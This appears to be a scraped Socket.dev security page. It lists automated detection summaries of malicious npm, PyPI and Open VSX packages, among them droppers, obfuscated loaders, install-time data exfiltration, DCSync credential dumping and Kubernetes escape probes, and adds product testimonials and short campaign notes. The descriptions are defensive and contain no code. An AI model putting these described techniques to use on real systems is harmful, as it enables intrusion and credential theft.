
Company News
Socket Has Acquired Secure Annex
Socket has acquired Secure Annex to expand extension security across browsers, IDEs, and AI tools.
Questions? Call us at (844) SOCKET-0
Quickly evaluate the security and health of any open source package.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This module performs host-wide SUID/SGID enumeration and then generates weaponized, tool-specific privilege-escalation command templates, including a persistence-oriented `systemctl` unit-writing + reverse-shell style payload pattern. It also executes an unsafe-mode `find /` command over the entire filesystem and returns sensitive discovery evidence (paths/owners/permissions). While runtime may be impacted by undefined variables in the exploitable path, the core behavior shown is a high-abuse “priv-esc recipe generator,” indicating malicious or at least intentionally offensive capability.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This code strongly indicates malicious/credential-theft functionality: it executes impacket secretsdump.py for DCSync (including krbtgt/Administrator/AzureAD SSO target selection), checks AD replication rights via ldapsearch, parses secretsdump output into extracted credentials, and includes actionable command templates for DCShadow and NTDS.dit extraction. It also uses allow_unsafe_shell=True with command strings built from external inputs and embeds passwords/NTLM hashes into command lines. If this is part of a dependency, it should be treated as highly suspicious and reviewed/blocked immediately.
@neoxr/wb
6.0.0-rc.44
by neoxr
Live on npm
Blocked by Socket
High-confidence identification of an obfuscated packer/loader. It uses anti-analysis string-table rotation plus dynamic Function(...) execution and injects browser/Node globals (window/require/module/exports) into the execution context. While the provided fragment does not show concrete exfiltration or persistence primitives directly, the loader pattern is commonly used to hide malicious behavior; the decoded payload must be inspected in a sandbox to confirm intent.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This module performs authenticated reconnaissance of Kubernetes mutating admission webhook configurations using in-cluster service account credentials and, upon detecting certain webhook configuration characteristics, returns weaponized exploitation guidance (DoS, selector evasion concepts, timing/race ideas, cyclic mutation/stack overflow ideas, and privileged pod/hostPath escalation). Even though the snippet itself does not directly modify cluster state, the inclusion of explicit attacker next-steps and the recon-to-exploitation framing make the behavior strongly suspicious and high risk for malicious use or internal abuse.
openhosta
4.3.0
Live on pypi
Blocked by Socket
This dependency implements dynamic evaluation of attacker-influenced Python source via `exec(cleaned_code, local_scope)` after only a syntax check (`ast.parse`). There is no sandboxing or restriction on capabilities, and the execution context uses a potentially shared class-level scope that could allow cross-call state mutation. Code-fence/escape normalization increases the likelihood that adversarially formatted payloads will be transformed into executable code. While no explicit network/file exfiltration is shown in this snippet, the capability to run arbitrary code makes it a high security-risk component and a strong candidate for supply-chain/runtime compromise if the input trust boundary is not strictly enforced.
@saputzx/baileys
1.0.0
by saputzx
Live on npm
Blocked by Socket
This fragment strongly matches a malicious/compromised dependency loader pattern: it is heavily obfuscated, performs runtime string decoding that drives dynamic execution via multiple new Function(...) sinks (eval-equivalent), probes execution environment globals, and orchestrates asynchronous outbound/API-style requests through imported utilities while extracting and repackaging rich remote metadata. The exact external endpoints/destinations are not explicitly visible in the excerpt, but the behavior profile is high risk and consistent with covert data retrieval/automation rather than legitimate library functionality.
frank-newton3-db-poc
1.0.5
by cketol
Live on npm
Blocked by Socket
This preinstall script is malicious: it collects sensitive local files, searches for databases and environment context, and posts that data to an external webhook. Installing this package would leak potentially sensitive information from the host to a third party. Treat as active data-exfiltration malware and do not install.
rhua-chatgpt-web
1.1.51
by hguang
Live on npm
Blocked by Socket
The bundle’s dominant security-relevant anomaly is an application-specific plugin executor that dynamically compiles and executes JavaScript from persisted plugin definitions (plugin_list) using new Function over plugin.func.body. This constitutes a high-risk arbitrary code execution capability that can be leveraged for supply-chain sabotage and potential data exfiltration, especially since the same runtime holds API credentials used in Authorization headers. The rest of the code appears consistent with an API SDK (stream parsing, request helpers, and prompt/tool utilities) without overt malicious payloads.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This module is highly suspicious and exploit-oriented: it uses an in-cluster service account token to actively create/delete Pods via the Kubernetes API, and it includes a crafted path traversal payload in serviceAccountToken.path aimed at a sensitive host location (systemd service path). The success criteria are based on API rejection text rather than definitive impact, but the explicit malicious payload and control-plane mutation strongly indicate an exploitation/probing component. Additionally, the snippet contains apparent syntax/logic defects (incomplete `demo_next =` and malformed exception return) that may prevent the final 'exploited' reporting path from executing, but they do not reduce the malicious intent evidenced earlier in the flow.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This module performs host-wide SUID/SGID enumeration and then generates weaponized, tool-specific privilege-escalation command templates, including a persistence-oriented `systemctl` unit-writing + reverse-shell style payload pattern. It also executes an unsafe-mode `find /` command over the entire filesystem and returns sensitive discovery evidence (paths/owners/permissions). While runtime may be impacted by undefined variables in the exploitable path, the core behavior shown is a high-abuse “priv-esc recipe generator,” indicating malicious or at least intentionally offensive capability.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This module is highly suspicious and likely malicious or offensive-purpose: it uses an in-cluster Kubernetes service account token to authenticate to the Kubernetes API and performs a state-changing operation by attempting to create a privileged pod (securityContext.privileged=True). If successful (or if permissive policy indicators are detected), it labels the environment as 'exploited' and includes a detailed, attacker-style exploitation chain for host and credential/token compromise. Even though the narrative is not executed as code, the overall behavior matches real privilege-escalation probing and would be dangerous in any environment where it is run with sufficient RBAC permissions.
esoftplay
0.0.268-betac8d7f9e
by danang
Live on npm
Blocked by Socket
This module is high-risk for supply-chain compromise. The most critical issues are (1) eval(cjson.config.post_script), which enables arbitrary code execution from config content, (2) automated expect-based EAS login using usr/pwd extracted from configuration, and (3) hardcoded Telegram Bot credentials used to send outbound messages via curl. In addition, it performs destructive rm -rf of node_modules/lockfiles followed by dependency installation, amplifying impact if any upstream config/path inputs are manipulated. Treat as untrusted until the full module and all config sources are verified and the eval/credential/exfil capabilities are removed or strictly controlled.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This dependency module is high-risk and appears deliberately weaponized: it performs Kubernetes token-based API discovery and hostpath/host filesystem access probing (including write testing) and, upon detection, returns a fully actionable exploitation/persistence and secret-exfiltration playbook in its result fields. Even without executing the payload itself, embedding direct reverse-shell and persistence instructions tied to detected conditions is a strong malicious/sabotage indicator. Treat as malicious or at minimum as an attack-enabling tool requiring immediate containment/review.
meche-dom
0.1.17
by kris.trajanoski
Live on npm
Blocked by Socket
This module is a high-security-review component masquerading as part of a dotenv-based package. The decisive behavior is a runtime decrypt-and-drop routine: it derives an AES-GCM key from environment secrets (LICENSE_KEY/SALT_KEY), decrypts all bundled encrypted/*.enc files, deletes any existing ./output directory, and writes decrypted plaintext to ./output. Even without visible exfiltration or execution in this fragment, the key-gated decryption plus disk staging is a classic supply-chain/payload concealment pattern and warrants immediate review of the decrypted artifacts and the downstream code that consumes ./output.
@pisell/materials
1.8.32
by jinglin.tan
Live on npm
Blocked by Socket
Suspicious supply-chain risk. The module includes privacy-invasive incognito detection exported globally and—more importantly—hardcodes third-party Feishu webhook endpoints and posts dynamically constructed message content (title/content) via fetch() without visible safeguards. Additional capabilities (clipboard write, runtime network printing calls, and native bridge forwarding) broaden the abuse surface. Even if intended for legitimate telemetry/notifications, the hardcoded content-carrying webhook exfiltration pattern warrants security review and restriction (e.g., allowlisting destinations, auditing call paths, and ensuring no sensitive data is sent).
@neoxr/wb
6.0.0-rc.44
by neoxr
Live on npm
Blocked by Socket
This module is best classified as a high-risk obfuscated runtime loader/packer. It dynamically reconstructs and executes hidden code via `Function(...)` and explicitly injects powerful environment accessors (`window`, `exports`, `require`), enabling broad malicious behavior in both browser and Node contexts. The exact downstream actions are not observable due to truncation/packing, but the structure is highly consistent with malicious supply-chain payload loaders. Treat as unsafe until the reconstructed payload is fully extracted and analyzed in a sandboxed environment.
@shepai/cli
1.194.3-pr586.23e3597
by shep-bot
Live on npm
Blocked by Socket
This module embeds an HTTP POST side effect that spawns the external `gh auth login --web` command in detached mode with ignored stdio and suppressed visibility. That is atypical for standard Next.js route runtime code and creates a high-risk pathway for unauthorized process execution / credential-adjacent behavior if the route is reachable without strong authorization and auditing. Additionally, it can disclose error details by returning `e.message` on spawn failure. Other parts of the fragment appear to be normal Next.js server scaffolding without obvious additional malicious primitives.
timemcp190825790125120985125
0.1.0
Live on pypi
Blocked by Socket
This fragment is a high-confidence malicious loader/dropper: it downloads arbitrary Python code from a hardcoded remote IP over unencrypted HTTP, writes it to the local temp directory as launcher.py, and executes it using pythonw.exe with no visible window. The absence of integrity/authenticity checks and the stealthy execution strongly indicate malware staging behavior rather than legitimate functionality.
boss-career-ops
0.7.0
Live on pypi
Blocked by Socket
This module is strongly indicative of malicious or highly abusive behavior: it implements an unauthenticated WebSocket command bridge that can steal cookies from a targeted site, capture screenshots, navigate and manipulate the user’s active tab, and execute attacker-supplied arbitrary JavaScript via new Function(params.script). It then exfiltrates results and telemetry back to the WebSocket endpoint. Transport is plaintext (ws://) and there are no security controls (validation/authentication/allowlisting), making the design suitable for command-and-control and data theft.
juanbanco-.solidity
0.0.189
by shesjutslikeyouandme
Live on openvsx
Blocked by Socket
This module is not consistent with a normal compiler/utility library. It implements a Windows Script Host dropper/loader: it stages and executes a payload via ActiveX/WScript, uses registry markers to manage persistence/anti-reinfection, verifies execution via stdout/stderr parsing, and includes dynamic code execution and evasion-like gating. Overall assessment: highly malicious behavior; treat the package as unsafe until isolated and fully analyzed in a sandbox.
@costrict/csc
4.0.13-beta.0
by zgsm
Live on npm
Blocked by Socket
This fragment is mostly consistent with sharp’s native module loader and image-processing option validation, but it also includes a macOS-only clipboard image extraction capability implemented via AppleScript (`osascript`). It reads user clipboard PNG data, writes it to `/tmp`, reads it back into memory, deletes the file, and returns the clipboard image bytes to the caller—an inherently privacy-sensitive behavior that can enable clipboard harvesting. No network exfiltration is shown in the provided code, so maliciousness depends on how the returned data is used by the importing application, but the capability itself is a significant security concern.
@atls/code-runtime
2.1.26
by torinasakura
Live on npm
Blocked by Socket
This fragment is a base64-backed file-dropper that writes an attacker-controlled directory tree to a caller-provided destination. The embedded decoded content strongly resembles CI/CD workflow and shell automation that performs secret-based registry authentication and downloads/extracts/installs artifacts—behavior commonly used in supply-chain attacks to achieve persistence and propagation via CI execution. Even though the module itself does not run commands, it substantially increases risk because it stages dangerous automation/config files for later execution.
nkit-framework
0.3.0
Live on pypi
Blocked by Socket
This module provides two direct arbitrary code execution pathways (in-process exec and out-of-process subprocess execution of attacker-written Python code) and further registers attacker-defined functions into a ToolRegistry, creating a persistent execution capability within the running application. It lacks sandboxing, validation, and authorization checks. If any untrusted party can trigger these functions, the security risk is critical. Do not expose these capabilities to untrusted inputs without strong sandboxing and strict controls.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This code is a container/host escape exploitation tester that performs real attack steps in non-safe mode—most notably using an exposed Docker socket to create a host-mounting container and retrieve /etc/passwd from the host via container logs, and using CAP_SYS_ADMIN to mount-bind '/' and read host passwd. It also probes/reads Kubernetes service account tokens and checks cloud metadata endpoints associated with credential theft. Overall, it represents high-risk offensive behavior consistent with malware/weaponized supply-chain content rather than benign scanning.
@shepai/cli
1.194.4-pr585.c5c90c7
by shep-bot
Live on npm
Blocked by Socket
This module embeds an HTTP POST side effect that spawns the external `gh auth login --web` command in detached mode with ignored stdio and suppressed visibility. That is atypical for standard Next.js route runtime code and creates a high-risk pathway for unauthorized process execution / credential-adjacent behavior if the route is reachable without strong authorization and auditing. Additionally, it can disclose error details by returning `e.message` on spawn failure. Other parts of the fragment appear to be normal Next.js server scaffolding without obvious additional malicious primitives.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This module performs host-wide SUID/SGID enumeration and then generates weaponized, tool-specific privilege-escalation command templates, including a persistence-oriented `systemctl` unit-writing + reverse-shell style payload pattern. It also executes an unsafe-mode `find /` command over the entire filesystem and returns sensitive discovery evidence (paths/owners/permissions). While runtime may be impacted by undefined variables in the exploitable path, the core behavior shown is a high-abuse “priv-esc recipe generator,” indicating malicious or at least intentionally offensive capability.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This code strongly indicates malicious/credential-theft functionality: it executes impacket secretsdump.py for DCSync (including krbtgt/Administrator/AzureAD SSO target selection), checks AD replication rights via ldapsearch, parses secretsdump output into extracted credentials, and includes actionable command templates for DCShadow and NTDS.dit extraction. It also uses allow_unsafe_shell=True with command strings built from external inputs and embeds passwords/NTLM hashes into command lines. If this is part of a dependency, it should be treated as highly suspicious and reviewed/blocked immediately.
@neoxr/wb
6.0.0-rc.44
by neoxr
Live on npm
Blocked by Socket
High-confidence identification of an obfuscated packer/loader. It uses anti-analysis string-table rotation plus dynamic Function(...) execution and injects browser/Node globals (window/require/module/exports) into the execution context. While the provided fragment does not show concrete exfiltration or persistence primitives directly, the loader pattern is commonly used to hide malicious behavior; the decoded payload must be inspected in a sandbox to confirm intent.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This module performs authenticated reconnaissance of Kubernetes mutating admission webhook configurations using in-cluster service account credentials and, upon detecting certain webhook configuration characteristics, returns weaponized exploitation guidance (DoS, selector evasion concepts, timing/race ideas, cyclic mutation/stack overflow ideas, and privileged pod/hostPath escalation). Even though the snippet itself does not directly modify cluster state, the inclusion of explicit attacker next-steps and the recon-to-exploitation framing make the behavior strongly suspicious and high risk for malicious use or internal abuse.
openhosta
4.3.0
Live on pypi
Blocked by Socket
This dependency implements dynamic evaluation of attacker-influenced Python source via `exec(cleaned_code, local_scope)` after only a syntax check (`ast.parse`). There is no sandboxing or restriction on capabilities, and the execution context uses a potentially shared class-level scope that could allow cross-call state mutation. Code-fence/escape normalization increases the likelihood that adversarially formatted payloads will be transformed into executable code. While no explicit network/file exfiltration is shown in this snippet, the capability to run arbitrary code makes it a high security-risk component and a strong candidate for supply-chain/runtime compromise if the input trust boundary is not strictly enforced.
@saputzx/baileys
1.0.0
by saputzx
Live on npm
Blocked by Socket
This fragment strongly matches a malicious/compromised dependency loader pattern: it is heavily obfuscated, performs runtime string decoding that drives dynamic execution via multiple new Function(...) sinks (eval-equivalent), probes execution environment globals, and orchestrates asynchronous outbound/API-style requests through imported utilities while extracting and repackaging rich remote metadata. The exact external endpoints/destinations are not explicitly visible in the excerpt, but the behavior profile is high risk and consistent with covert data retrieval/automation rather than legitimate library functionality.
frank-newton3-db-poc
1.0.5
by cketol
Live on npm
Blocked by Socket
This preinstall script is malicious: it collects sensitive local files, searches for databases and environment context, and posts that data to an external webhook. Installing this package would leak potentially sensitive information from the host to a third party. Treat as active data-exfiltration malware and do not install.
rhua-chatgpt-web
1.1.51
by hguang
Live on npm
Blocked by Socket
The bundle’s dominant security-relevant anomaly is an application-specific plugin executor that dynamically compiles and executes JavaScript from persisted plugin definitions (plugin_list) using new Function over plugin.func.body. This constitutes a high-risk arbitrary code execution capability that can be leveraged for supply-chain sabotage and potential data exfiltration, especially since the same runtime holds API credentials used in Authorization headers. The rest of the code appears consistent with an API SDK (stream parsing, request helpers, and prompt/tool utilities) without overt malicious payloads.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This module is highly suspicious and exploit-oriented: it uses an in-cluster service account token to actively create/delete Pods via the Kubernetes API, and it includes a crafted path traversal payload in serviceAccountToken.path aimed at a sensitive host location (systemd service path). The success criteria are based on API rejection text rather than definitive impact, but the explicit malicious payload and control-plane mutation strongly indicate an exploitation/probing component. Additionally, the snippet contains apparent syntax/logic defects (incomplete `demo_next =` and malformed exception return) that may prevent the final 'exploited' reporting path from executing, but they do not reduce the malicious intent evidenced earlier in the flow.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This module performs host-wide SUID/SGID enumeration and then generates weaponized, tool-specific privilege-escalation command templates, including a persistence-oriented `systemctl` unit-writing + reverse-shell style payload pattern. It also executes an unsafe-mode `find /` command over the entire filesystem and returns sensitive discovery evidence (paths/owners/permissions). While runtime may be impacted by undefined variables in the exploitable path, the core behavior shown is a high-abuse “priv-esc recipe generator,” indicating malicious or at least intentionally offensive capability.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This module is highly suspicious and likely malicious or offensive-purpose: it uses an in-cluster Kubernetes service account token to authenticate to the Kubernetes API and performs a state-changing operation by attempting to create a privileged pod (securityContext.privileged=True). If successful (or if permissive policy indicators are detected), it labels the environment as 'exploited' and includes a detailed, attacker-style exploitation chain for host and credential/token compromise. Even though the narrative is not executed as code, the overall behavior matches real privilege-escalation probing and would be dangerous in any environment where it is run with sufficient RBAC permissions.
esoftplay
0.0.268-betac8d7f9e
by danang
Live on npm
Blocked by Socket
This module is high-risk for supply-chain compromise. The most critical issues are (1) eval(cjson.config.post_script), which enables arbitrary code execution from config content, (2) automated expect-based EAS login using usr/pwd extracted from configuration, and (3) hardcoded Telegram Bot credentials used to send outbound messages via curl. In addition, it performs destructive rm -rf of node_modules/lockfiles followed by dependency installation, amplifying impact if any upstream config/path inputs are manipulated. Treat as untrusted until the full module and all config sources are verified and the eval/credential/exfil capabilities are removed or strictly controlled.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This dependency module is high-risk and appears deliberately weaponized: it performs Kubernetes token-based API discovery and hostpath/host filesystem access probing (including write testing) and, upon detection, returns a fully actionable exploitation/persistence and secret-exfiltration playbook in its result fields. Even without executing the payload itself, embedding direct reverse-shell and persistence instructions tied to detected conditions is a strong malicious/sabotage indicator. Treat as malicious or at minimum as an attack-enabling tool requiring immediate containment/review.
meche-dom
0.1.17
by kris.trajanoski
Live on npm
Blocked by Socket
This module is a high-security-review component masquerading as part of a dotenv-based package. The decisive behavior is a runtime decrypt-and-drop routine: it derives an AES-GCM key from environment secrets (LICENSE_KEY/SALT_KEY), decrypts all bundled encrypted/*.enc files, deletes any existing ./output directory, and writes decrypted plaintext to ./output. Even without visible exfiltration or execution in this fragment, the key-gated decryption plus disk staging is a classic supply-chain/payload concealment pattern and warrants immediate review of the decrypted artifacts and the downstream code that consumes ./output.
@pisell/materials
1.8.32
by jinglin.tan
Live on npm
Blocked by Socket
Suspicious supply-chain risk. The module includes privacy-invasive incognito detection exported globally and—more importantly—hardcodes third-party Feishu webhook endpoints and posts dynamically constructed message content (title/content) via fetch() without visible safeguards. Additional capabilities (clipboard write, runtime network printing calls, and native bridge forwarding) broaden the abuse surface. Even if intended for legitimate telemetry/notifications, the hardcoded content-carrying webhook exfiltration pattern warrants security review and restriction (e.g., allowlisting destinations, auditing call paths, and ensuring no sensitive data is sent).
@neoxr/wb
6.0.0-rc.44
by neoxr
Live on npm
Blocked by Socket
This module is best classified as a high-risk obfuscated runtime loader/packer. It dynamically reconstructs and executes hidden code via `Function(...)` and explicitly injects powerful environment accessors (`window`, `exports`, `require`), enabling broad malicious behavior in both browser and Node contexts. The exact downstream actions are not observable due to truncation/packing, but the structure is highly consistent with malicious supply-chain payload loaders. Treat as unsafe until the reconstructed payload is fully extracted and analyzed in a sandboxed environment.
@shepai/cli
1.194.3-pr586.23e3597
by shep-bot
Live on npm
Blocked by Socket
This module embeds an HTTP POST side effect that spawns the external `gh auth login --web` command in detached mode with ignored stdio and suppressed visibility. That is atypical for standard Next.js route runtime code and creates a high-risk pathway for unauthorized process execution / credential-adjacent behavior if the route is reachable without strong authorization and auditing. Additionally, it can disclose error details by returning `e.message` on spawn failure. Other parts of the fragment appear to be normal Next.js server scaffolding without obvious additional malicious primitives.
timemcp190825790125120985125
0.1.0
Live on pypi
Blocked by Socket
This fragment is a high-confidence malicious loader/dropper: it downloads arbitrary Python code from a hardcoded remote IP over unencrypted HTTP, writes it to the local temp directory as launcher.py, and executes it using pythonw.exe with no visible window. The absence of integrity/authenticity checks and the stealthy execution strongly indicate malware staging behavior rather than legitimate functionality.
boss-career-ops
0.7.0
Live on pypi
Blocked by Socket
This module is strongly indicative of malicious or highly abusive behavior: it implements an unauthenticated WebSocket command bridge that can steal cookies from a targeted site, capture screenshots, navigate and manipulate the user’s active tab, and execute attacker-supplied arbitrary JavaScript via new Function(params.script). It then exfiltrates results and telemetry back to the WebSocket endpoint. Transport is plaintext (ws://) and there are no security controls (validation/authentication/allowlisting), making the design suitable for command-and-control and data theft.
juanbanco-.solidity
0.0.189
by shesjutslikeyouandme
Live on openvsx
Blocked by Socket
This module is not consistent with a normal compiler/utility library. It implements a Windows Script Host dropper/loader: it stages and executes a payload via ActiveX/WScript, uses registry markers to manage persistence/anti-reinfection, verifies execution via stdout/stderr parsing, and includes dynamic code execution and evasion-like gating. Overall assessment: highly malicious behavior; treat the package as unsafe until isolated and fully analyzed in a sandbox.
@costrict/csc
4.0.13-beta.0
by zgsm
Live on npm
Blocked by Socket
This fragment is mostly consistent with sharp’s native module loader and image-processing option validation, but it also includes a macOS-only clipboard image extraction capability implemented via AppleScript (`osascript`). It reads user clipboard PNG data, writes it to `/tmp`, reads it back into memory, deletes the file, and returns the clipboard image bytes to the caller—an inherently privacy-sensitive behavior that can enable clipboard harvesting. No network exfiltration is shown in the provided code, so maliciousness depends on how the returned data is used by the importing application, but the capability itself is a significant security concern.
@atls/code-runtime
2.1.26
by torinasakura
Live on npm
Blocked by Socket
This fragment is a base64-backed file-dropper that writes an attacker-controlled directory tree to a caller-provided destination. The embedded decoded content strongly resembles CI/CD workflow and shell automation that performs secret-based registry authentication and downloads/extracts/installs artifacts—behavior commonly used in supply-chain attacks to achieve persistence and propagation via CI execution. Even though the module itself does not run commands, it substantially increases risk because it stages dangerous automation/config files for later execution.
nkit-framework
0.3.0
Live on pypi
Blocked by Socket
This module provides two direct arbitrary code execution pathways (in-process exec and out-of-process subprocess execution of attacker-written Python code) and further registers attacker-defined functions into a ToolRegistry, creating a persistent execution capability within the running application. It lacks sandboxing, validation, and authorization checks. If any untrusted party can trigger these functions, the security risk is critical. Do not expose these capabilities to untrusted inputs without strong sandboxing and strict controls.
mindfabric-agent
1.1.352
Live on pypi
Blocked by Socket
This code is a container/host escape exploitation tester that performs real attack steps in non-safe mode—most notably using an exposed Docker socket to create a host-mounting container and retrieve /etc/passwd from the host via container logs, and using CAP_SYS_ADMIN to mount-bind '/' and read host passwd. It also probes/reads Kubernetes service account tokens and checks cloud metadata endpoints associated with credential theft. Overall, it represents high-risk offensive behavior consistent with malware/weaponized supply-chain content rather than benign scanning.
@shepai/cli
1.194.4-pr585.c5c90c7
by shep-bot
Live on npm
Blocked by Socket
This module embeds an HTTP POST side effect that spawns the external `gh auth login --web` command in detached mode with ignored stdio and suppressed visibility. That is atypical for standard Next.js route runtime code and creates a high-risk pathway for unauthorized process execution / credential-adjacent behavior if the route is reachable without strong authorization and auditing. Additionally, it can disclose error details by returning `e.message` on spawn failure. Other parts of the fragment appear to be normal Next.js server scaffolding without obvious additional malicious primitives.
Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.
Possible typosquat attack
Known malware
Git dependency
GitHub dependency
HTTP dependency
Obfuscated code
Suspicious Stars on GitHub
Telemetry
Protestware or potentially unwanted behavior
Unstable ownership
Critical CVE
High CVE
Medium CVE
Low CVE
Unpopular package
Minified code
Bad dependency semver
Wildcard dependency
Socket optimized override available
Deprecated
Unmaintained
Explicitly Unlicensed Item
License Policy Violation
Misc. License Issues
Ambiguous License Classifier
Copyleft License
License exception
No License Found
Non-permissive License
Unidentified License
Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.
Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.

Nat Friedman
CEO at GitHub

Suz Hinton
Senior Software Engineer at Stripe
heck yes this is awesome!!! Congrats team 🎉👏

Matteo Collina
Node.js maintainer, Fastify lead maintainer
So awesome to see @SocketSecurity launch with a fresh approach! Excited to have supported the team from the early days.

DC Posch
Director of Technology at AppFolio, CTO at Dynasty
This is going to be super important, especially for crypto projects where a compromised dependency results in stolen user assets.

Luis Naranjo
Software Engineer at Microsoft
If software supply chain attacks through npm don't scare the shit out of you, you're not paying close enough attention.
@SocketSecurity sounds like an awesome product. I'll be using socket.dev instead of npmjs.org to browse npm packages going forward

Elena Nadolinski
Founder and CEO at Iron Fish
Huge congrats to @SocketSecurity! 🙌
Literally the only product that proactively detects signs of JS compromised packages.

Joe Previte
Engineering Team Lead at Coder
Congrats to @feross and the @SocketSecurity team on their seed funding! 🚀 It's been a big help for us at @CoderHQ and we appreciate what y'all are doing!

Josh Goldberg
Staff Developer at Codecademy
This is such a great idea & looks fantastic, congrats & good luck @feross + team!
The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.

Scott Roberts
CISO at UiPath
As a happy Socket customer, I've been impressed with how quickly they are adding value to the product, this move is a great step!

Yan Zhu
Head of Security at Brave, DEFCON, EFF, W3C
glad to hear some of the smartest people i know are working on (npm, etc.) supply chain security finally :). @SocketSecurity

Andrew Peterson
CEO and Co-Founder at Signal Sciences (acq. Fastly)
How do you track the validity of open source software libraries as they get updated? You're prob not. Check out @SocketSecurity and the updated tooling they launched.
Supply chain is a cluster in security as we all know and the tools from Socket are "duh" type tools to be implementing. Check them out and follow Feross Aboukhadijeh to see more updates coming from them in the future.

Zbyszek Tenerowicz
Senior Security Engineer at ConsenSys
socket.dev is getting more appealing by the hour

Devdatta Akhawe
Head of Security at Figma
The @SocketSecurity team is on fire! Amazing progress and I am exciting to see where they go next.

Sebastian Bensusan
Engineer Manager at Stripe
I find it surprising that we don't have _more_ supply chain attacks in software:
Imagine your airplane (the code running) was assembled (deployed) daily, with parts (dependencies) from internet strangers. How long until you get a bad part?
Excited for Socket to prevent this

Adam Baldwin
VP of Security at npm, Red Team at Auth0/Okta
Congrats to everyone at @SocketSecurity ❤️🤘🏻

Nico Waisman
CISO at Lyft
This is an area that I have personally been very focused on. As Nat Friedman said in the 2019 GitHub Universe keynote, Open Source won, and every time you add a new open source project you rely on someone else code and you rely on the people that build it.
This is both exciting and problematic. You are bringing real risk into your organization, and I'm excited to see progress in the industry from OpenSSF scorecards and package analyzers to the company that Feross Aboukhadijeh is building!
Questions? Call us at (844) SOCKET-0
Secure your team's dependencies across your stack with Socket. Stop supply chain attacks before they reach production.
RUST
Rust Package Manager
PHP
PHP Package Manager
GOLANG
Go Dependency Management
JAVA
JAVASCRIPT
Node Package Manager
.NET
.NET Package Manager
PYTHON
Python Package Index
RUBY
Ruby Package Manager
SWIFT
AI
AI Model Hub
CI
CI/CD Workflows
EXTENSIONS
Chrome Browser Extensions
EXTENSIONS
VS Code Extensions
Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.
Nov 23, 2025
Shai Hulud v2
Shai Hulud v2 campaign: preinstall script (setup_bun.js) and loader (setup_bin.js) that installs/locates Bun and executes an obfuscated bundled malicious script (bun_environment.js) with suppressed output.
Nov 05, 2025
Elves on npm
A surge of auto-generated "elf-stats" npm packages is being published every two minutes from new accounts. These packages contain simple malware variants and are being rapidly removed by npm. At least 420 unique packages have been identified, often described as being generated every two minutes, with some mentioning a capture the flag challenge or test.
Jul 04, 2025
RubyGems Automation-Tool Infostealer
Since at least March 2023, a threat actor using multiple aliases uploaded 60 malicious gems to RubyGems that masquerade as automation tools (Instagram, TikTok, Twitter, Telegram, WordPress, and Naver). The gems display a Korean Glimmer-DSL-LibUI login window, then exfiltrate the entered username/password and the host's MAC address via HTTP POST to threat actor-controlled infrastructure.
Mar 13, 2025
North Korea's Contagious Interview Campaign
Since late 2024, we have tracked hundreds of malicious npm packages and supporting infrastructure tied to North Korea's Contagious Interview operation, with tens of thousands of downloads targeting developers and tech job seekers. The threat actors run a factory-style playbook: recruiter lures and fake coding tests, polished GitHub templates, and typosquatted or deceptive dependencies that install or import into real projects.
Jul 23, 2024
Network Reconnaissance Campaign
A malicious npm supply chain attack that leveraged 60 packages across three disposable npm accounts to fingerprint developer workstations and CI/CD servers during installation. Each package embedded a compact postinstall script that collected hostnames, internal and external IP addresses, DNS resolvers, usernames, home and working directories, and package metadata, then exfiltrated this data as a JSON blob to a hardcoded Discord webhook.
Questions? Call us at (844) SOCKET-0
Get our latest security research, open source insights, and product updates.

Company News
Socket has acquired Secure Annex to expand extension security across browsers, IDEs, and AI tools.

Research
/Security News
Socket is tracking cloned Open VSX extensions tied to GlassWorm, with several updated from benign-looking sleepers into malware delivery vehicles.

Product
Reachability analysis for PHP is now available in experimental, helping teams identify which vulnerabilities are actually exploitable.